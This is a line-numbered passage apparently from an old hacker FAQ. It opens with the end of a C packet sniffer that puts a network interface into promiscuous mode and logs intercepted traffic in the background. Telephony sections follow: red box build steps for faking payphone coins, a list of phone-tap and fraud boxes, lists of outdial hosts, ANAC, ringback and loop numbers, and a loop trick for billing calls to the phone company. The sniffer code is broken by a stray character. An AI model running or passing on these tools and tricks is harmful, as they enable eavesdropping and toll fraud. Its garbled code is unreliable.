  958.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  959.     fflush(LOG);
  960.     if(LOG != stdout)
  961.         fclose(LOG);
  962.     exit(1);
  963. }
  964.  
  965. /* opens network interface, performs ioctls and reads from it,
  966.  * passing data to filter function
  967.  */
  968. void do_it()
  969. {
  970.     int cc;
  971.     char *buf;
  972.     u_short sp_ts_len;
  973.  
  974.     if(!(buf=malloc(CHUNKSIZE)))
  975.         Pexit(1,"Eth: malloc");
  976.  
  977. /* this /dev/nit initialization code pinched from etherfind */
  978.   {
  979.     struct strioctl si;
  980.     struct ifreq    ifr;
  981.     struct timeval  timeout;
  982.     u_int  chunksize = CHUNKSIZE;
  983.     u_long if_flags  = NI_PROMISC;
  984.  
  985.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  986.         Pexit(1,"Eth: nit open");
  987.  
  988.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  989.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  990.  
  991.     si.ic_timout = INFTIM;
  992.  
  993.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  994.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  995.  
  996.     timeout.tv_sec = 1;
  997.     timeout.tv_usec = 0;
  998.     si.ic_cmd = NIOCSTIME;
  999.     si.ic_len = sizeof(timeout);
  1000.     si.ic_dp  = (char *)&timeout;
  1001.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1002.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1003.  
  1004.     si.ic_cmd = NIOCSCHUNK;
  1005.     si.ic_len = sizeof(chunksize);
  1006.     si.ic_dp  = (char *)&chunksize;
  1007.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1008.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1009.  
  1010.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1011.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1012.     si.ic_cmd = NIOCBIND;
  1013.     si.ic_len = sizeof(ifr);
  1014.     si.ic_dp  = (char *)𝔦
  1015.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1016.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1017.  
  1018.     si.ic_cmd = NIOCSFLAGS;
  1019.     si.ic_len = sizeof(if_flags);
  1020.     si.ic_dp  = (char *)&if_flags;
  1021.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1022.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1023.  
  1024.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1025.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  1026.   }
  1027.  
  1028.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1029.         register char *bp = buf,
  1030.                       *bufstop = (buf + cc);
  1031.  
  1032.         while (bp < bufstop) {
  1033.             register char *cp = bp;
  1034.             register struct nit_bufhdr *hdrp;
  1035.  
  1036.             hdrp = (struct nit_bufhdr *)cp;
  1037.             cp += sizeof(struct nit_bufhdr);
  1038.             bp += hdrp->nhb_totlen;
  1039.             filter(cp, (u_long)hdrp->nhb_msglen);
  1040.         }
  1041.     }
  1042.     Pexit((-1),"Eth: read");
  1043. }
  1044.  /* Authorize your proogie,generate your own password and uncomment here */
  1045. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1046.  
  1047. void getauth()
  1048. { char *buf,*getpass(),*crypt();
  1049.   char pwd[21],prmpt[81];
  1050.  
  1051.     strcpy(pwd,AUTHPASSWD);
  1052.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1053.     buf=getpass(prmpt);
  1054.     if(strcmp(pwd,crypt(buf,pwd)))
  1055.         exit(1);
  1056. }
  1057.     */
  1058. void main(argc, argv)
  1059. int argc;
  1060. char **argv;
  1061. {
  1062.     char   cbuf[BUFSIZ];
  1063.     struct ifconf ifc;
  1064.     int    s,
  1065.            ac=1,
  1066.            backg=0;
  1067.  
  1068.     ProgName=argv[0];
  1069.  
  1070.  /*     getauth(); */
  1071.  
  1072.     LOG=NULL;
  1073.     device=NULL;
  1074.     while((ac<argc) && (argv[ac][0] == '-')) {
  1075.        register char ch = argv[ac++][1];
  1076.        switch(toupper(ch)) {
  1077.             case 'I': device=argv[ac++];
  1078.                       break;
  1079.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1080.                          Zexit(1,"Output file cant be opened\n");
  1081.                       break;
  1082.             case 'B': backg=1;
  1083.                       break;
  1084.             case 'D': debug=1;
  1085.                       break;
  1086.             default : fprintf(ERR,
  1087.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1088.                             ProgName);
  1089.                       exit(1);
  1090.        }
  1091.     }
  1092.  
  1093.     if(!device) {
  1094.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1095.             Pexit(1,"Eth: socket");
  1096.  
  1097.         ifc.ifc_len = sizeof(cbuf);
  1098.         ifc.ifc_buf = cbuf;
  1099.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1100.             Pexit(1,"Eth: ioctl");
  1101.  
  1102.         close(s);
  1103.         device = ifc.ifc_req->ifr_name;
  1104.     }
  1105.  
  1106.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1107.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1108.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1109.  
  1110.     if(!LOG)
  1111.         LOG=stdout;
  1112.  
  1113.     signal(SIGINT, death);
  1114.     signal(SIGTERM,death);
  1115.     signal(SIGKILL,death);
  1116.     signal(SIGQUIT,death);
  1117.  
  1118.     if(backg && debug) {
  1119.          fprintf(ERR,"[Cannot bg with debug on]\n");
  1120.          backg=0;
  1121.     }
  1122.  
  1123.     if(backg) {
  1124.         register int s;
  1125.  
  1126.         if((s=fork())>0) {
  1127.            fprintf(ERR,"[pid %d]\n",s);
  1128.            exit(0);
  1129.         } else if(s<0)
  1130.            Pexit(1,"fork");
  1131.  
  1132.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1133.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  1134.                 close(s);
  1135.         }
  1136.     }
  1137.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1138.     fflush(LOG);
  1139.  
  1140.     do_it();
  1141. }
  1142.  
  1143.  
  1144. 21. What is an Internet Outdial?
  1145.  
  1146. An Internet outdial is a modem connected to the Internet than you can
  1147. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1148. (Global OutDial) is capable of calling long distance.  Outdials are an
  1149. inexpensive method of calling long distance BBS's.
  1150.  
  1151.  
  1152. 22. What are some Internet Outdials?
  1153.  
  1154. This FAQ answer is excerpted from: BlackAdders FTP/FSP Site List.
  1155.  
  1156.  
  1157. Area    Address(s)                      Command(s)
  1158. ------  ------------------------------- ---------------------
  1159. 201     128.112.88.0
  1160.     128.112.88.1
  1161.     128.112.88.2
  1162.     128.112.88.3
  1163. 204     umnet.cc.manitoba.ca            "dial12" or "dial24"
  1164. 206     dialout24.cac.washington.edu
  1165. 215     wiseowl.ocis.temple.edu         atz
  1166.                     atdt 9xxxyyyy
  1167.     129.72.1.59                     hayes compat
  1168. 218     aa28.d.umn.edu                  cli
  1169.                     rlogin modem
  1170.                     at "login:" type 
  1171.                     "modem"
  1172.     modem.d.umn.edu                 "Hayes"
  1173. 232     isn.rdns.iastate.edu            MODEM              [Works!!]
  1174.                     atz 
  1175.                     atdt8xxx-xxxx
  1176. 303     129.82.100.64                   login: modem       [need password!]
  1177. 307     modem.uwyo.edu
  1178.     129.72.1.59                     hayes compat
  1179. 313     35.1.1.6                        "dial2400-aa" or   [can't connect]
  1180.                     "dial1200-aa"
  1181. 404     emory.edu                       .modem8 or
  1182.                     .dialout
  1183.     broadband.cc.emory.edu          .modem8 or
  1184.                     .dialout
  1185.     128.140.1.239                   .modem8|CR
  1186.                     or .modem96|CR
  1187. 412     gate.cis.pitt.edu               LAT
  1188.                     connect dialout
  1189.                     ^E
  1190.                     atdt 91k xxx-xxxx
  1191. 415     128.32.132.250                  "dial1" or "dial2"
  1192. 416     pacx.utcs.utoronto.ca           modem
  1193.                     atdt 9xxx-xxxx
  1194.     annex132.berkely.edu            atdt 9,,,,, xxx-xxxx
  1195. 502     uknet.uky.edu                   outdial2400
  1196.                     atdt 9xxx-xxxx
  1197. 514     132.204.2.11                    externe#9 9xxx-xxxx
  1198. 515     isn.rdns.iastate.edu            login MODEM 
  1199.                     dial atdt8xxx-yyyy
  1200. 602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy
  1201.     129.219.17.3                    login: MODEM
  1202.                     atdt 8xxx-xxxx
  1203. 609     129.72.1.59                     "Hayes"
  1204.     128.119.131.110                 "Hayes"
  1205.     128.119.131.111         
  1206.     128.119.131.112
  1207.     128.119.131.113
  1208.     128.119.131.114
  1209.     128.112.131.110
  1210.     128.112.131.111
  1211.     128.112.131.112
  1212.     128.112.131.113
  1213.     128.112.131.114                 the above are hayes
  1214. 614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]
  1215. 615     dca.utk.edu                     "dial2400"
  1216. 617     dialout.lcs.mit.edu
  1217. 619     dialin.ucsd.edu                 "dialout"
  1218.     128.54.30.1                     nue
  1219. 713     128.143.70.101                  "connect hayes"
  1220.     128.249.27.154                  c modem96
  1221.                     atdt 9xxx-xxxx
  1222.     128.249.27.153                  " -+ as above +- "
  1223.     modem24.bcm.tmc.edu
  1224.     modem12.bcm.tmc.edu
  1225. 714     130.191.4.70                    atdt 8xxx-xxxx
  1226. 804     ublan.acc.virginia.edu          c hayes
  1227.     128.143.70.101                  connect hayes
  1228.                     atdt xxx-xxxx
  1229. 902     star.ccs.tuns.ca                "dialout"          [down...]
  1230. 916     128.120.2.251                   "dialout"          [down...]
  1231.         129.137.33.72                                      [can't connect]
  1232. ???     dialout1.princeton.edu                             [can't connect]
  1233.         dswitch.byu.edu                 "C Modem"          [can't connect]
  1234.         modem.cis.uflu.edu                                 [can't connect]
  1235.         r596adi1.uc.edu                                    [can't connect]
  1236.         vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]
  1237.         18.26.0.55                                         [can't connect]
  1238.         128.173.5.4                                        [need password!]
  1239.         128.187.1.2                                        [need password!]
  1240.         129.137.33.71                                      [can't connect]
  1241.         bstorm.bga.com / port=4000                         [what is this?]
  1242.  
  1243.  
  1244. N 23. What is an anonymous remailer?
  1245.  
  1246. An anonymous remailer is a system on the Internet that allows you to
  1247. send e-mail anonymously or post messages to Usenet anonymously.
  1248.  
  1249. You apply for an anonymous ID at the remailer site.  Then, when you
  1250. send a message to the remailer, it sends it out from your anonymous ID
  1251. at the remailer.  No one reading the post will know your real account
  1252. name or host name.  If someone sends a message to your anonymous ID,
  1253. it will be forwarded to your real account by the remailer.
  1254.  
  1255.  
  1256. N 24. What are the addresses of some anonymous remailers?
  1257.  
  1258. The most popular and stable anonymous remailer is anon.penet.fi,
  1259. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  1260. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  1261. at penet, mail help@anon.penet.fi.
  1262.  
  1263.  
  1264.  
  1265. Section B: Telephony
  1266. ~~~~~~~~~~~~~~~~~~~~
  1267.  
  1268. 01. What is a Red Box?
  1269.  
  1270. When a coin is inserted into a payphone, the phone emits a set of
  1271. tones.  A red box is a device that simulates those tones, with the
  1272. purpose of fooling the payphone into believing you have inserted an
  1273. actual coin.
  1274.  
  1275.  
  1276. 02. How do I build a Red Box?
  1277.  
  1278. Red boxes are commonly manufactured from modified Radio Shack tone
  1279. dialers, Hallmark greeting cards, or made from scratch from readily
  1280. available electronic components.
  1281.  
  1282. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  1283. open the dialer and replace the crystal (the largest shiny metal
  1284. component) with a crystal close to 6.5Mhz.  The most popular choice is
  1285. the 6.5536Mhz crystal.  When you are finished, program the P1 button
  1286. with five *'s.  That will simulate a quarter tone.
  1287.  
  1288.  
  1289. 03. Which payphones will a Red Box work on?
  1290.  
  1291. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  1292. (Customer Owned Coin Operated Telephones).
  1293.  
  1294.  
  1295. 04. What is a Blue Box?
  1296.  
  1297. Blue boxes use a 2600hz tone to convince telephone switches that use
  1298. in-band signalling that the caller is actually a telephone operator.
  1299. The caller may then access special switch functions, with the usual
  1300. purpose of making free long distance phone calls, using the
  1301. Multi-Frequency tones provided by the Blue Box.
  1302.  
  1303.  
  1304. 05. Do Blue Boxes still work?
  1305.  
  1306. Blue Boxes still work in areas using in-band signalling.  Modern phone
  1307. signalling switches using ESS (Electronic Signalling Systems) use
  1308. out-of-band-signalling.  Nothing you send over the voice portion of
  1309. bandwidth can control the switch.
  1310.  
  1311.  
  1312. 06. What is a Black Box?
  1313.  
  1314. A Black Box is a 10k ohm resistor placed across your phone line to
  1315. cause the phone company equipment to be unable to detect that you have
  1316. answered your telephone.  People who call you will then not be billed
  1317. for the telephone call.
  1318.  
  1319.  
  1320. 07. What do all the colored boxes do?
  1321.  
  1322. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  1323.              Call Forwarding on old 4-wire phone systems
  1324. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  1325. Beige        Lineman's hand set
  1326. Black        Allows the calling party to not be billed for the call
  1327.              placed
  1328. Blast        Phone microphone amplifier
  1329. Blotto       Supposedly shorts every fone out in the immediate area
  1330. Blue         Emulate a true operator by siezing a trunk with a 2600hz
  1331.              tone
  1332. Brown        Create a party line from 2 phone lines
  1333. Bud          Tap into your neighbors phone line
  1334. Chartreuse   Use the electricity from your phone line
  1335. Cheese       Connect two phones to create a divertor
  1336. Chrome       Manipulate Traffic Signals by Remote Control
  1337. Clear        A telephone pickup coil and a small amp use to make free
  1338.              calls on Fortress Phones
  1339. Color        Line activated telephone recorder
  1340. Copper       Cause crosstalk interference on an extender
  1341. Crimson      Hold button
  1342. Dark         Re-route outgoing or incoming calls to another phone
  1343. Dayglo       Connect to your neighbors phone line
  1344. Divertor     Re-route outgoing or incoming calls to another phone
  1345. DLOC         Create a party line from 2 phone lines
  1346. Gold         Trace calls, tell if the call is being traced, and can
  1347.              change a trace
  1348. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  1349. Infinity     Remotely activated phone tap
  1350. Jack         Touch-Tone key pad
  1351. Light        In-use light
  1352. Lunch        AM transmitter
  1353. Magenta      Connect a remote phone line to another remote phone line
  1354. Mauve        Phone tap without cutting into a line
  1355. Neon         External microphone
  1356. Noise        Create line noise
  1357. Olive        External ringer
  1358. Party        Create a party line from 2 phone lines
  1359. Pearl        Tone generator
  1360. Pink         Create a party line from 2 phone lines
  1361. Purple       Telephone hold button
  1362. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  1363. Razz         Tap into your neighbors phone
  1364. Red          Make free phone calls from pay phones by generating
  1365.              quarter tones
  1366. Rock         Add music to your phone line
  1367. Scarlet      Cause a neighbors phone line to have poor reception
  1368. Silver       Create the DTMF tones for A, B, C and D
  1369. Static       Keep the voltage on a phone line high
  1370. Switch       Add hold, indicator lights, conferencing, etc..
  1371. Tan          Line activated telephone recorder
  1372. Tron         Reverse the phase of power to your house, causing your
  1373.              electric meter to run slower
  1374. TV Cable     "See" sound waves on your TV
  1375. Urine        Create a capacitative disturbance between the ring and
  1376.              tip wires in another's telephone headset
  1377. Violet       Keep a payphone from hanging up
  1378. White        Portable DTMF keypad
  1379. Yellow       Add an extension phone
  1380.  
  1381.  
  1382. 08. What is the ANAC number for my area?
  1383.  
  1384. How to find your ANAC number:
  1385.  
  1386. Look up your NPA (Area Code) and try the number listed for it. If that
  1387. fails, try 1 plus the number listed for it.  If that fails, try the
  1388. common numbers like 311, 958 and 200-222-2222. If that fails, try the
  1389. nationwide ANAC number 404-988-9664. If you find the ANAC number for
  1390. your area, please let us know.
  1391.  
  1392. Note that many times the ANAC number will vary for different
  1393. switches in the same city.
  1394.  
  1395. A trick to getting the number of the phone line you are calling from
  1396. is to call an (800) phone sex line.  Example: (800)571-8859.  These
  1397. systems will give you an account number, which in many cases includes
  1398. the telephone number of the phone from which you are calling.
  1399.  
  1400. Another useful 800 ANAC number is the Duke Power Company Automated
  1401. Outage System at (800)769-3766.  The system will read back to you
  1402. the phone number from which you are calling.
  1403.  
  1404. Even another 800 ANAC number is Info Access Telephone Company's
  1405. Automated Blocking line at (800)568-3197.  It will read back to
  1406. you the number from which you are calling, and ask if you would like
  1407. it blocked.
  1408.  
  1409. Please use local ANAC numbers if you can, as abuse or overuse kills
  1410. 800 ANAC numbers.
  1411.  
  1412.  
  1413. NPA  ANAC number      Comments
  1414. ---  ---------------  ---------------------------------------------
  1415. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  1416. 202  958-xxxx         Dictrict of Columbia
  1417. 203  960              CT (All)
  1418. 203  970              CT (All)
  1419. 204  644-xxxx         Manitoba
  1420. 205  908-222-2222     Birmingham, AL
  1421. 206  411              WA /* Not US West */
  1422. 207  958              ME (All)
  1423. 209  830              Stockton, CA
  1424. 212  958              Manhattan, NY
  1425. 213  114              Los Angeles, CA
  1426. 213  1223             Los Angeles, CA /* some 1AESS switches */
  1427. 213  211-2345         Los Angeles, CA /* English response */
  1428. 213  211-2346         Los Angeles, CA /* DTMF response */
  1429. 213  61056            Los Angeles, CA
  1430. 214  790              Dallas, TX /* GTE */
  1431. 214  970-222-2222     Dallas, TX
  1432. 214  970-611-1111     Dallas, TX /* Southwestern Bell */
  1433. 215  410-xxxx         Philadelphia, PA
  1434. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  1435. 301  958-9968         Hagerstown/Rockville, MD
  1436. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  1437. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  1438. 310  114              Long Beach, CA /* on many GTE switches */
  1439. 310  1223             Long Beach, CA /* some 1AESS switches */
  1440. 310  211-2345         Long Beach, CA /* English response */
  1441. 310  211-2346         Long Beach, CA /* DTMF response */
  1442. 312  1-200-5863       Chicago, IL
  1443. 312  200-xxx-xxxx     Chicago, IL
  1444. 312  290              Chicago, IL
  1445. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  1446. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  1447. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  1448. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  1449. 314  511              Columbia/Jefferson City, MO
  1450. 317  310-222-2222     Indianapolis/Kokomo, IN
  1451. 317  743-1218         Indianapolis/Kokomo, IN
  1452. 401  222-2222         RI (All)
  1453. 402  311              Lincoln, NE
  1454. 403  311              Alberta, Yukon and N.W. Territory
  1455. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  1456. 403  999              Alberta, Yukon and N.W. Territory
  1457. 404  311              Atlanta, GA
  1458. 404  940-xxx-xxxx     Atlanta, GA
  1459. 405  897              Enid/Oklahoma City, OK
  1460. 407  200-222-2222     Orlando/West Palm Beach, FL
  1461. 408  300-xxx-xxxx     San Jose, CA
  1462. 408  760              San Jose, CA
  1463. 408  940              San Jose, CA
  1464. 409  951              Beaumont/Galveston, TX
  1465. 409  970-xxxx         Beaumont/Galveston, TX
  1466. 410  200-555-1212     Annapolis/Baltimore, MD
  1467. 410  811              Annapolis/Baltimore, MD
  1468. 412  711-6633         Pittsburgh, PA
  1469. 412  711-4411         Pittsburgh, PA
  1470. 412  999-xxxx         Pittsburgh, PA
  1471. 413  958              Pittsfield/Springfield, MA
  1472. 413  200-555-5555     Pittsfield/Springfield, MA
  1473. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  1474. 415  200-555-1212     San Francisco, CA
  1475. 415  211-2111         San Francisco, CA
  1476. 415  2222             San Francisco, CA
  1477. 415  640              San Francisco, CA
  1478. 415  760-2878         San Francisco, CA
  1479. 415  7600-2222        San Francisco, CA
  1480. 419  311              Toledo, OH
  1481. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  1482. 503  611              Portland, OR  /* not all parts of town */
  1483. 508  958              Fall River/New Bedford/Worchester, MA
  1484. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  1485. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  1486. 509  560              Spokane/Walla Walla/Yakima, WA
  1487. 512  200-222-2222     Austin/Corpus Christi, TX
  1488. 512  830              Austin/Corpus Christi, TX
  1489. 512  970-xxxx         Austin/Corpus Christi, TX
  1490. 514  320-xxxx         Montreal, Quebec
  1491. 515  5463             Des Moines, IA
  1492. 516  958              Hempstead/Long Island, NY
  1493. 516  968              Hempstead/Long Island, NY
  1494. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  1495. 517  200200200200200  Bay City/Jackson/Lansing, MI
  1496. 518  997              Albany/Schenectady/Troy, NY
  1497. 518  998              Albany/Schenectady/Troy, NY
  1498. 602  593-0809         Phoenix, AZ
  1499. 602  593-6017         Phoenix, AZ
  1500. 602  593-7451         Phoenix, AZ
  1501. 603  200-222-2222     NH (All)
  1502. 606  997-555-1212     Ashland/Winchester, KY
  1503. 607  993              Binghamton/Elmira, NY
  1504. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  1505. 612  511              Minneapolis/St.Paul, MN
  1506. 615  200200200200200  Nashville, TN
  1507. 615  830              Nashville, TN
  1508. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  1509. 617  200-222-1234     Boston, MA
  1510. 617  200-222-2222     Boston, MA
  1511. 617  200-444-4444     Boston, MA /* Woburn, MA */
  1512. 617  220-2622         Boston, MA
  1513. 617  958              Boston, MA
  1514. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  1515. 708  1-200-xxxx       Chicago/Elgin, IL
  1516. 713  970-xxxx         Houston, TX
  1517. 714  211-2121         Anaheim, CA /* GTE */
  1518. 716  511              Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */
  1519. 717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  1520. 718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  1521. 802  2-222-222-2222   Vermont (All)
  1522. 802  200-222-2222     Vermont (All)
  1523. 805  830              San Luis Obispo, CA
  1524. 806  970-xxxx         Amarillo/Lubbock, TX
  1525. 810  200200200200200  Michigan
  1526. 812  410-555-1212     Evansville, IN
  1527. 813  270-8711         Ft. Meyers/St. Petersburg/Tampa, FL
  1528. 815  200-xxx-xxxx     La Salle/Rockford, IL
  1529. 815  290              La Salle/Rockford, IL
  1530. 817  211              Ft. Worth/Waco, TX
  1531. 817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */
  1532. 818  1223             Pasadena, CA /* some 1AESS switches */
  1533. 818  211-2345         Pasadena, CA /* English response */
  1534. 818  211-2346         Pasadena, CA /* DTMF response */
  1535. 906  200-222-2222     Marquette/Sault Ste. Marie, MI
  1536. 908  958              New Brunswick, NJ
  1537. 910  311              Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
  1538. 914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  1539. 915  970-xxxx         Abilene/El Paso, TX
  1540. 919  711              Durham, NC
  1541.  
  1542.  
  1543. Canada:
  1544. 306  115              Saskatchewan, Canada
  1545. 416  410-xxxx         Toronto, Ontario
  1546. 416  997-xxxx         Toronto, Ontario
  1547. 519  320-xxxx         London, Ontario
  1548. 604  1116             British Columbia, Canada
  1549. 604  1211             British Columbia, Canada
  1550. 604  211              British Columbia, Canada
  1551. 613  320-2232         Ottawa, Ontario
  1552. 705  320-xxxx         Saulte Ste. Marie, Ontario
  1553.  
  1554. Australia:
  1555. +61  03-552-4111      Victoria 03 area
  1556. +61  19123            All major capital cities
  1557.  
  1558.  
  1559. 09. What is a ringback number?
  1560.  
  1561. A ringback number is a number that you call that will immediately
  1562. ring the telephone from which it was called.
  1563.  
  1564. In most instances you must call the ringback number, quickly hang up
  1565. the phone for just a short moment and then let up on the switch, you
  1566. will then go back off hook and hear a different tone.  You may then
  1567. hang up.  You will be called back seconds later.
  1568.  
  1569.  
  1570. 10. What is the ringback number for my area?
  1571.  
  1572. 202  958-xxxx         District of Columbia
  1573. 203  991-xxxx         CT (All)
  1574. 209  890-xxxx         Stockton, CA
  1575. 213  1-95x-xxxx       Los Angeles, CA
  1576. 301  958-xxxx         Hagerstown/Rockville, MD
  1577. 303  99X-xxxx         Grand Junction, CO
  1578. 312  200-xxxx         Chicago, IL
  1579. 412  985-xxxx         Pittsburgh, PA
  1580. 415  350-xxxx         San Francisco, CA
  1581. 416  57x-xxxx         Toronto, Ontario
  1582. 416  99x-xxxx         Toronto, Ontario
  1583. 416  999-xxx-xxxx     Toronto, Ontario
  1584. 502  988              Lexington, KY
  1585. 512  95X-xxxx         Austin, TX
  1586. 514  320-xxxx         Montreal, Quebec
  1587. 601  777-xxxx         MS (All)
  1588. 619  331-xxxx         San Diego, CA
  1589. 619  332-xxxx         San Diego, CA
  1590. 703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  1591. 716  981-xxxx         Rochester, NY /* Rochester Tel */
  1592. 719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  1593. 801  938-xxxx         Utah (All)
  1594. 801  939-xxxx         Utah (All)
  1595. 813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  1596.  
  1597. Australia:
  1598. +61 199
  1599.  
  1600.  
  1601. 11. What is a loop?
  1602.  
  1603. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  1604.                                    by Minor Threat & Mucho Maas
  1605.  
  1606. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  1607. and 836-9999.  They are used by the phone company for testing.  What
  1608. good do loops do us?  Well, they are cool in a few ways.  Here is a
  1609. simple use of loops.  Each loop has two ends, a 'high' end, and a
  1610. 'low' end.  One end gives a (usually) constant, loud tone when it is
  1611. called. The other end is silent.  Loops don't usually ring either.
  1612. When BOTH ends are called, the people that called each end can talk
  1613. through the loop.  Some loops are voice filtered and won't pass
  1614. anything but a constant tone; these aren't much use to you.  Here's
  1615. what you can use working loops for:  billing phone calls!  First, call
  1616. the end that gives the loud tone.  Then if the operator or someone
  1617. calls the other end, the tone will go quiet.  Act like the phone just
  1618. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  1619. what the fuck ever.  The operator thinks that she just called you, and
  1620. that's it!  Now the phone bill will go to the loop, and your local
  1621. RBOC will get the bill!  Use this technique in moderation, or the loop
  1622. may go down.  Loops are probably most useful when you want to talk to
  1623. someone to whom you don't want to give your phone number.
  1624.  
  1625.  
  1626. 12. What is a loop in my area?
  1627.  
  1628. Many of these loops are no longer functional.  If you are local
  1629. to any of these loops, please try them out an e-mail me the results
  1630. of your research.
  1631.  
  1632. NPA    High      Low
  1633. ---  --------  --------
  1634. 201  228-9929  228-9930
  1635. 201  238-9929  238-9930
  1636. 201  251-9929  251-9930
  1637. 201  254-9929  254-9930
  1638. 201  272-9929  272-9930
  1639. 201  330-9929  330-9930
  1640. 201  333-9929  333-9930
  1641. 201  339-9929  339-9930
  1642. 201  347-9929  347-9930
  1643. 201  376-9929  376-9930
  1644. 201  398-9929  398-9930
  1645. 201  467-9929  467-9930
  1646. 201  528-9929  528-9930
  1647. 201  558-9929  558-9930
  1648. 201  559-9929  559-9930
  1649. 201  560-9929  560-9930
  1650. 201  592-9929  592-9930
  1651. 201  625-9929  625-9930
  1652. 201  631-9929  631-9930
  1653. 201  637-9929  637-9930
  1654. 201  655-9929  655-9930
  1655. 201  666-9929  666-9930
  1656. 201  690-9929  690-9930
  1657. 201  761-9929  761-9930
  1658. 201  762-9929  762-9929
  1659. 201  762-9929  762-9930
  1660. 201  762-9929  762-9929
  1661. 201  763-9929  763-9930
  1662. 201  764-9929  764-9930
  1663. 201  767-9929  767-9930
  1664. 201  768-9929  768-9930
  1665. 201  773-9929  773-9930
  1666. 201  879-9929  879-9930
  1667. 201  946-9929  946-9930
  1668. 201  992-9929  992-9930
  1669. 201  993-9929  993-9930
  1670. 201  994-9929  994-9930
  1671. 213  360-1118  360-1119
  1672. 213  365-1118  365-1119
  1673. 213  455-0002  455-xxxx
  1674. 213  455-0002  455-XXXX
  1675. 213  546-0002  546-XXXX
  1676. 213  546-0002  546-xxxx
  1677. 305  778-9952  778-9951
  1678. 305  964-9951  964-9952
  1679. 312  222-9973  222-9974
  1680. 312  234-9973  234-9974
  1681. 313  224-9996  224-9997
  1682. 313  225-9996  225-9997
  1683. 313  234-9996  234-9997
  1684. 313  237-9996  237-9997
  1685. 313  256-9996  256-9997
  1686. 313  272-9996  272-9997
  1687. 313  273-9996  273-9997
  1688. 313  277-9996  277-9997
  1689. 313  281-9996  281-9997
  1690. 313  292-9996  292-9997
  1691. 313  299-9996  299-9997
  1692. 313  321-9996  321-9997
  1693. 313  326-9996  326-9997
  1694. 313  356-9996  356-9997
  1695. 313  362-9996  362-9997
  1696. 313  369-9996  369-9997
  1697. 313  388-9996  388-9997
  1698. 313  397-9996  397-9997
  1699. 313  399-9996  399-9997
  1700. 313  445-9996  445-9997
  1701. 313  465-9996  465-9997
  1702. 313  471-9996  471-9997
  1703. 313  474-9996  474-9997
  1704. 313  477-9996  477-9997
  1705. 313  478-9996  478-9997
  1706. 313  483-9996  483-9997
  1707. 313  497-9996  497-9997
  1708. 313  526-9996  526-9997
  1709. 313  552-9996  552-9997
  1710. 313  556-9996  556-9997
  1711. 313  561-9996  561-9997
